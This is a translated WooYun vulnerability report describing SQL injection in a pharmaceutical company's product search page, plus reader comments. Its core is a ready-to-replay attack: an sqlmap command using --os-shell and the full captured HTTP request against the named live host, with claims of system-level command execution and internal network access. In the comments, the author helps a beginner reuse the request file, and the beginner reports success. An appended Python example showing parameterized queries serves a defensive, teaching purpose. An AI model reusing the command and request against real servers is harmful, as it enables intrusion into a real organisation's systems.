Vulnerability summary

Defect ID: wooyun-2014-084717

Title: DBA-privilege SQL injection at a 华润三九 (China Resources Sanjiu) endpoint (system-privilege shell obtained)

Affected vendor: 华润三九 (China Resources Sanjiu)

Author: 白非白

Submitted: 2014-11-26 09:56

Fix time: 2014-12-01 09:58

Published: 2014-12-01 09:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-11-26: details sent to the vendor, awaiting vendor handling
2014-12-01: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

The internal network is fully within reach; a pity I don't enjoy playing around on internal networks, so what now?

Detailed description:

The injection point is in the search function: http://web.999.com.cn/sj/pro.aspx?tiao=1

[screenshot: 11.jpg]


With sqlmap set up as follows, a shell with system privileges is obtained and arbitrary commands can be executed:

sqlmap.py -r 999.txt --os-shell


Contents of 999.txt (note the line-wrapping in the code area; when reproducing, make sure the pasted request is still valid HTTP):

POST /sj/pro.aspx?tiao=1 HTTP/1.1
Host: web.999.com.cn
Proxy-Connection: keep-alive
Content-Length: 3347
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://web.999.com.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 UBrowser/3.1.1644.34 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://web.999.com.cn/sj/pro.aspx?tiao=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vucq3piurlfvow45aifti1rb

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDc3OTgyOTkwD2QWAmYPZBYCAgMPZBYGAgUPFgIeC18hSXRlbUNvdW50AgwWGGYPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9Ng%2FooaXnm4rosIPnkIboja9kAgEPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9OAnmipfnlJ%2FntKBkAgIPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTIP5Lit6I2v5rOo5bCE5YmCZAIDD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTIP5oSf5YaS5q2i5ZKz6I2vZAIED2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTMP6IKg6IOD5raI5YyW6I2vZAIFD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTQP56Wb6YKq5q2j5L2T6I2vZAIGD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTUP55qu6IKk5aSW55So6I2vZAIHD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTcM5aaH56eR55So6I2vZAIID2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTkM5oqX6IK%2F55ik6I2vZAIJD2QWAmYPFQIScHJvLmFzcHg%2FVHlwZWlkPTEwDOmFjeaWuemil%2BeykmQCCg9kFgJmDxUCEnByby5hc3B4P1R5cGVpZD0xMQ%2FmuIXng63op6Pmr5Loja9kAgsPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTMG5YW25LuWZAIHD2QWCAIBD2QWBAIBDw8WAh4EVGV4dAUM6I2v5ZOB5pCc57SiZGQCAw8WAh8AZmQCAw8PFgIfAQUM6I2v5ZOB5pCc57SiZGQCBQ8WAh8AZmQCBw8PFgYeCFBhZ2VTaXplAgoeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQCCQ8WAh8BBaELPGRpdiBjbGFzcz0ibGluazEiPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovLzk5OWdtbC5jb20uY24vIiAgIHRhcmdldD0iX2JsYW5rIj45OTnmhJ%2FlhpLngbU8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlweXAuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B55qu6IKk6I2v5a625pePPC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5LmNvbS5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5Y2O5ram5LiJ5Lmd5Yy76I2v6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly85OTlwaGFybS5jb20uY24vcHJvLmFzcCIgICB0YXJnZXQ9Il9ibGFuayI%2B5rex5Zyz5LiJ5Lmd5Lit5Yy76I2v5oqV6LWE5Y%2BR5bGV5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuMzl6eS5jb20iICAgdGFyZ2V0PSJfYmxhbmsiPua3seWcs%2BW4guS4ieS5neeOsOS7o%2BS4reiNr%2BaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Lmdvc3VuY2hpbmEuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mlrDoja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuYWhqYy5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5a6J5b696YeR6J%2B%2B55Sf5YyW6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cueWE5OTkuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B6ZuF5a6J5LiJ5Lmd6I2v5Lia5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5YmouY29tIiAgIHRhcmdldD0iX2JsYW5rIj7ljJfkuqzkuInkuZ3oja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlqeC5jb20uY24iICAgdGFyZ2V0PSJfYmxhbmsiPuaxn%2Bilv%2BS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vc2RzYW5qaXV5eS5iaXp0eC5jbi8iICAgdGFyZ2V0PSJfYmxhbmsiPuWxseS4nOS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Ljk5OW5rLmNuIiAgIHRhcmdldD0iX2JsYW5rIj7muZbljZfkuInkuZ3ljZflvIDliLboja%2FmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5bmluZXN0YXIuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mmJ%2FljbDliLfljIXoo4Xpm4blm6LmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEmN0bDAwJEltYWdlQnV0dG9uMXMgz3N2dpdbmh6Fz3HjmyrXPj%2Fb&__EVENTVALIDATION=%2FwEWAwKMpsmMBgK33sGJAQLssvLQAxoyWrcK7rrKvmTSrKtmUzqiYq4L&ctl00%24TextBox1=%E4%B8%89%E4%B9%9D*&ctl00%24ImageButton1.x=19&ctl00%24ImageButton1.y=10


Things to watch out for when using sqlmap:

[screenshot: 1.jpg]

Proof of vulnerability:

system shell:

[screenshot: 2.jpg]


[screenshot: 3.jpg]


Internal network information:

[screenshot: 4.jpg]


No need to worry about privilege escalation at all.

Fix recommendation:

You should know.
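The fix the report leaves implicit is the usual one for an injectable search field: bind the search term as a query parameter instead of concatenating it into the SQL text, and run the web application's database account without DBA rights so that any injection that does slip through cannot be turned into operating-system command execution as happened here. The following is an added illustration, not code from the report or from the affected site; it uses an in-memory SQLite table with constructed product names and a hypothetical product search to contrast the concatenated query with the parameterized one.

```python
import sqlite3

# Constructed sample rows standing in for a product table (not real data).
SAMPLE_PRODUCTS = [
    "sanjiu cold remedy",
    "sanjiu stomach tablet",
    "O'Reilly reference",
    "skin cream",
]


def make_db():
    """Build a throwaway in-memory database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?)", [(n,) for n in SAMPLE_PRODUCTS]
    )
    return conn


def search_concatenated(conn, term):
    """Vulnerable pattern: the user-supplied term becomes part of the SQL text,
    so any quote or operator inside it is parsed by the database engine."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%' ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, term):
    """Hardened pattern: the SQL text is fixed and the term is sent as a bound
    value, so it is only ever compared against column data, never parsed."""
    sql = "SELECT name FROM products WHERE name LIKE ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def demo(term):
    """Run both variants on the same input and return
    (concatenated_result, parameterized_result). If the concatenated query
    fails to parse, its result is reported as the exception class name."""
    conn = make_db()
    try:
        vulnerable = search_concatenated(conn, term)
    except sqlite3.Error as exc:
        vulnerable = type(exc).__name__
    return vulnerable, search_parameterized(conn, term)


if __name__ == "__main__":
    # A plain term behaves identically in both versions.
    print(demo("sanjiu"))
    # A term containing a quote breaks the concatenated SQL (syntax error)
    # while the bound parameter simply matches the row that contains it.
    print(demo("O'Reilly"))
```

The single quote in the second input is enough to show the defect: in the concatenated version the database treats it as SQL syntax, which is exactly the property an injection relies on, whereas the bound version never lets input reach the parser. Parameterization removes the injection; restricting the database account to the privileges the application actually needs is what keeps a missed case from reaching the operating system, since the os-shell capability used in this report depends on administrative database features.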

Copyright notice: when reposting, please credit the source, 白非白@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2014-12-01 09:58

Vendor reply:

Latest status:

2014-12-11: following up


Vulnerability rating:

Comments

  1. 2015-04-07 20:57 | harbour_bin ( Regular white hat | Rank:358 Vulns:47 | Marching toward the TOP 200!)

    Hi, a quick question first: which folder should the file for -r 999.txt be placed in? I'm a beginner, thanks.

  2. 2015-04-07 22:32 | 白非白 ( Regular white hat | Rank:447 Vulns:60 | ♫ Freedom - Anthony Hamilton ♫)

    @harbour_bin If you use -r 999.txt as is, it has to be in the same directory as sqlmap.py. Or you can give an explicit path, and then you can put it wherever you like, e.g. -r c:\python27\123\999.txt. Either works.

  3. 2015-04-08 08:38 | harbour_bin ( Regular white hat | Rank:358 Vulns:47 | Marching toward the TOP 200!)

    @白非白 It worked, thanks.